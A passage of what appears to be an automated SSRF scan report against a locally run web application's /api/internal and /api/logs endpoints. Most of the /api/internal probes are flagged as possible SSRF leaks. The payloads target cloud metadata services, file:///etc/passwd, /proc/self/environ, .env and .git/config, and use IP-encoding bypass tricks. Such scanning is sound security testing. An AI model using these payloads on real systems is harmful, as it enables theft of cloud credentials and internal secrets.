vulnerability at:** `http://localhost:4200/api/internal?url=192.0.0.192%2Flatest%2Fattributes%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=192.0.0.192%2Flatest%2Fmeta-data%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=192.0.0.192%2Flatest%2Fmeta-data%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=192.0.0.192%2Flatest%2Fuser-data%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=192.0.0.192%2Flatest%2Fuser-data%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=3232235521` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=3232235521` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=3232235777` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=3232235777` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=425.510.425.510` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=425.510.425.510` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A22` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A25` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A25` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A3128` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A3128` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A3389` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A3389` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A8000` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A8000` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A8001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A8001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A8444` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A8444` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A9901` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A9901` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=app-169-254-169-254.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=app-169-254-169-254.nip.io` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=customer2-app-169-254-169-254.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=customer2-app-169-254-169-254.nip.io` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=instance-data` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=instance-data` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A22` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A443` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A443` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A3389` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A3389` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A8000` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A8000` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A8001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A8001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A8444` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A8444` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A9901` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A9901` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost.localdomain` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost.localdomain` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=loopback` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=loopback` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=loopback%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=loopback%3A22` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=loopback%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=loopback%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=loopback%3A443` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=loopback%3A443` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=loopback%3A3389` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=loopback%3A3389` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=loopback%3A8000` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=loopback%3A8000` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=loopback%3A9901` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=loopback%3A9901` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=loopback%3A8001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=loopback%3A8001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=loopback%3A8444` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=loopback%3A8444` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=ipcop.localdomain%3A8443` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=ipcop.localdomain%3A8443` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=metadata.nicob.net` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=metadata.nicob.net` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=owasp.org.169.254.169.254.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=owasp.org.169.254.169.254.nip.io` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=ssrf-169.254.169.254.localdomain.pw` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=ssrf-169.254.169.254.localdomain.pw` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=ssrf-cloud.localdomain.pw` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=ssrf-cloud.localdomain.pw` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=www.owasp.org.1ynrnhl.xip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=www.owasp.org.1ynrnhl.xip.io` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A80%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A25%2F%20SMTP` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A25%2F%20SMTP` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A3128%2F%20Squid` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A3128%2F%20Squid` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B0000%3A%3A1%5D%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B0000%3A%3A1%5D%3A80%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=2130706433%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=2130706433%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=3232235521%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=3232235521%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=3232235777%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=3232235777%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0x7f000001%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0x7f000001%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0xc0a80014%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0xc0a80014%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%7Bdomain%7D%40127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%7Bdomain%7D%40127.0.0.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%23%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%23%7Bdomain%7D` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%7Bdomain%7D.127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%7Bdomain%7D.127.0.0.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2F%7Bdomain%7D` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%7Bdomain%7D%40localhost` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%7Bdomain%7D%40localhost` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%23%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%23%7Bdomain%7D` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%7Bdomain%7D.localhost` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%7Bdomain%7D.localhost` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%2F%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%2F%7Bdomain%7D` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%2F%3Fd%3D%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%2F%3Fd%3D%7Bdomain%7D` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2500%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2500%7Bdomain%7D` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3F%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3F%7Bdomain%7D` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=st%3A00011211aaaa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=st%3A00011211aaaa` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` _(GET response leak)_ +## Testing endpoint: http://localhost:4200/api/logs +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/logs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/logs?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/logs?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/logs?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/logs?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/logs?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/logs?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/logs?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/logs?url=127.1%3A80` +- Testing: `http://localhost:4200/api/logs?url=0` +- Testing: `http://localhost:4200/api/logs?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A80` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/logs?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/logs?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/logs?url=127.127.127.127` +- Testing: `http://localhost:4200/api/logs?url=127.0.1.3` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.0` +- Testing: `http://localhost:4200/api/logs?url=2130706433` +- Testing: `http://localhost:4200/api/logs?url=017700000001` +- Testing: `http://localhost:4200/api/logs?url=0x7f000001` +- Testing: `http://localhost:4200/api/logs?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/logs?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/logs?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/logs?url=google.com.localhost` +- Testing: `http://localhost:4200/api/logs?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/logs?url=localtest.me` +- Testing: `http://localhost:4200/api/logs?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/logs?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/logs?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/logs?url=2130706433%2F` +- Testing: `http://localhost:4200/api/logs?url=3232235521%2F` +- Testing: `http://localhost:4200/api/logs?url=3232235777%2F` +- Testing: `http://localhost:4200/api/logs?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/logs?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/logs?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/logs?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/logs?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/logs?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/logs?url=0%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1` +- Testing: `http://localhost:4200/api/logs?url=127.0.1` +- Testing: `http://localhost:4200/api/logs?url=localtest.me` +- Testing: `http://localhost:4200/api/logs?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/logs?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/logs?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/logs?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/logs?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/logs?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/logs?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/logs?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/logs?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.0.1.3` +- Testing: `http://localhost:4200/api/logs?url=0` +- Testing: `http://localhost:4200/api/logs?url=127.1` +- Testing: `http://localhost:4200/api/logs?url=127.0.1` +- Testing: `http://localhost:4200/api/logs?url=localhost` +- Testing: `http://localhost:4200/api/logs?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/logs?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/logs?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/logs?url=0177.0.0.01` +- Testing: 